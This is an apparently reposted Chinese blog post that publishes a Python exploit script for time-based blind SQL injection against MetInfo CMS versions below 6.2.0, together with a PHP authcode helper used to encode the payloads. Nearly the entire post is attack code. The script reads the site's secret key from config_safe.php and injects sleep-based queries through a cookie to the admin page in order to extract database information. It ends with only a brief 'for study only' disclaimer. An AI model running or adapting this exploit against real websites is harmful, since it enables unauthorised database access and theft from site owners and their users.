metinfo小於v6.2.0版本SQL盲註利用腳本
阿新 • • 發佈:2019-04-19
測試 int tex lee firefox lan amp name ont
#coding=utf-8 import requests import re import sys import time #獲取config_safe.php中的 key def getKey(url,headers,local_url): try: url_key = url + "/config/config_safe.php" rsp = requests.get(url_key,headers) p = re.compile(r‘<\?php\/\*(.*)\*\/\?>‘) p1 = p.findall(rsp.text) key = p1[0] databaseLen(key,headers,local_url,url) except: sys.exit("The website is secure!!") #獲取數據庫長度 def databaseLen(key,headers,local_url,url): for str in range(1,21): str = ‘%d‘%str payload = "1%27%20or%20if((select%20length(database())="+ str +"),sleep(5),1)%23" queryKey(key,headers,payload,local_url,url) #獲取encode後的數據 def queryKey(key,headers,str,local_url,url): payload = "key="+key+"&str="+str rsp = requests.post(local_url,headers = headers,data = payload) # str = rsp.url # data = str.replace(‘+‘,‘%20‘).replace(‘%28‘,‘(‘).replace(‘%29‘,‘)‘).replace(‘%3D‘,‘=‘).replace(‘%2C‘,‘,‘) # print(data) getTestUrl(url,rsp.text,headers) #獲取需要測試的URL def getTestUrl(url,payload,headers): params = {‘n‘:‘user‘,‘m‘:‘web‘,‘c‘:‘register‘,‘a‘:‘doemailvild‘} cookies = {‘Phpstorm-cd979afe‘:‘49f537dc-5078-4407-a224-9fbd39b31aa6‘,‘PHPSESSID‘:‘bba89344cb69a733ca0e20c46d7338b4‘,‘p‘:payload} test_url = url + "/admin/index.php" rsp = requests.get(test_url,params = params,cookie = cookies) str = rsp.url getData(str,headers) #獲取數據 def getData(url,headers): startTime = time.time(); rsp = requests.get(url,headers) if time.time() - startTime > 4: print("ok") else: pass if __name__ == ‘__main__‘: headers = { "Content-Type":"application/x-www-form-urlencoded", "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language":"en-US,en;q=0.5" } url = input("please input URL:") if "http://" or "https://" in url: local_url = input("請輸入本地搭建的encode函數地址:") getKey(url,headers,local_url) else: print("please input the correct url!!")
本地搭建的encode函數源碼:
<?php function authcode($string, $operation = ‘DECODE‘, $key = ‘‘, $expiry = 0){ $ckey_length = 4; $key = md5($key ? $key : UC_KEY); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == ‘DECODE‘ ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ‘‘; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == ‘DECODE‘ ? base64_decode(substr($string, $ckey_length)) : sprintf(‘%010d‘, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ‘‘; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == ‘DECODE‘) { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ‘‘; } }else{ return $keyc.str_replace(‘=‘, ‘‘, base64_encode($result)); } } print_r(urlencode(authcode($_POST[‘str‘],‘ENCOUDE‘,$_POST[‘key‘],0)));
僅供學習交流使用,請勿惡意攻擊他人網站,如非法利用,與本人無關。
metinfo小於v6.2.0版本SQL盲註利用腳本